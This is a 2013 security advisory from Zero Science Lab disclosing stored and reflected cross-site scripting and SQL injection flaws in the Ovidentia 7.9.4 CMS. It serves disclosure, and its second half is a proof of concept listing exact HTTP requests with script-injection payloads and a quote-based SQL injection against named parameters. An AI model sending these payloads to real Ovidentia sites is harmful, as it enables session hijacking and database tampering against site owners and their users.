Gjoko KrsticZSL-2013-5154Ovidentia 7.9.4 Multiple Remote Vulnerabilities
7.5 High
AI Score
Confidence
High
Title: Ovidentia 7.9.4 Multiple Remote Vulnerabilities
Advisory ID: ZSL-2013-5154
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data, Cross-Site Scripting
Risk: (3/5)
Release Date: 22.08.2013
Summary
Ovidentia is both a content management system (CMS) and a collaborative environment (Groupware).
Description
Input passed via several parameters is not properly sanitized before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user’s browser session in context of an affected site.
Vendor
Cantico - <http://www.ovidentia.org>
Affected Version
7.9.4
Tested On
Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://packetstormsecurity.com/files/122896>
[2] <http://secunia.com/advisories/54587/>
[3] <http://cxsecurity.com/issue/WLB-2013080177>
[4] <http://www.securityfocus.com/bid/61936>
[5] <http://www.exploit-db.com/exploits/27771/>
[6] <http://www.osvdb.org/show/osvdb/96516>
[7] <http://1337day.com/1337day-2013-21147>
[8] <http://forums.cnet.com/7726-6132_102-5489845.html>
[9] <http://www.securelist.com/en/advisories/54587>
[10] <http://securitytracker.com/id/1028943>
[11] <http://www.eeye.com/resources/security-center/research/zero-day-tracker/2013/20130822>
[12] <http://xforce.iss.net/xforce/xfdb/86603>
[13] <http://xforce.iss.net/xforce/xfdb/86605>
[14] <http://xforce.iss.net/xforce/xfdb/86606>
Changelog
[22.08.2013] - Initial release
[23.08.2013] - Added reference [6]
[24.08.2013] - Added reference [7], [8] and [9]
[26.08.2013] - Added reference [10]
[07.09.2013] - Added reference [11]
[14.10.2013] - Added reference [12], [13] and [14]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Ovidentia 7.9.4 Multiple Remote Vulnerabilities
Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4
Summary: Ovidentia is both a content management system (CMS) and
a collaborative environment (Groupware).
Desc: Input passed via several parameters is not properly sanitized
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code and HTML/script code in a user's browser session in context of
an affected site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5154
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5154.php
08.08.2013
---
============================================================
#1 - Stored XSS
------------------------------------------------------------
POST http://localhost/ovidentia/index.php HTTP/1.1
tg users
idx Create
pos A
grp
widget_filepicker_job_uid[] 52154a53cc0de
user[nickname] "><script>alert(1);</script>
user[password1] pass123
user[password2] pass123
user[notifyuser] 0
user[sendpwd] 0
user[sn] Testingusio
user[mn] M
user[givenname] Testa
user[email] "><script>alert(2);</script>
============================================================
#2 - Stored XSS
------------------------------------------------------------
POST http://localhost/ovidentia/index.php HTTP/1.1
user[id] 2
tg user
idx Modify
item 2
pos
grp
widget_filepicker_job_uid[] 52154bde9410a
user[nickname] test
user[setpwd] 0
user[password1]
user[password2]
user[sendpwd] 0
user[sn] "><script>alert(3);</script>
user[mn] M
user[givenname] "><script>alert(4);</script>
user[email] [email protected]
GET http://localhost/ovidentia/index.php?tg=user&idx=Modify&item=2&pos=&grp= HTTP/1.1
============================================================
#3 - Stored XSS
------------------------------------------------------------
POST http://localhost/ovidentia/index.php HTTP/1.1
Submit2 Update
idx modify
item 1
ovmldetail "><script>alert(5);</script>
ovmlembedded "><script>alert(6);</script>
tg admoc
update ovmldb
============================================================
#4 - Reflected XSSs
------------------------------------------------------------
GET http://localhost/ovidentia/index.php?tg=users&bupd="><script>alert(7);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=addon/widgets/groups&idx=get&id_parent="><script>alert(8);</script>&uid=widget_acl99&levels=2&id_delegation=0
GET http://localhost/ovidentia/index.php?tg=admoc&idx=addoc&item="><script>alert(9);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A"><script>alert(10);</script>&grp=&sSearchText= HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=users&idx=List&pos=A&grp=&sSearchText="><script>alert(11);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?tg=admfm&idx=modify&fid=1"><script>alert(12);</script> HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=options&tg=calopt&urla=javascript:prompt(13); HTTP/1.1
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1_<script>prompt(14)</script>&iIdProject=-1&tg=usrTskMgr
GET http://localhost/ovidentia/index.php?idx=displayGanttChart&iIdOwner=1&iIdProject=0_<script>prompt(15)</script>&tg=usrTskMgr
GET http://localhost/ovidentia/index.php?ids=1"onmouseover=prompt(16)>&idx=hpriv&tg=topman
============================================================
#5 - SQL Injection
------------------------------------------------------------
GET http://localhost/ovidentia/index.php?tg=admoc&idx=octypes&action=delete_type&item=1%27&entitytype=2
</p></body></html>7.5 High
AI Score
Confidence
High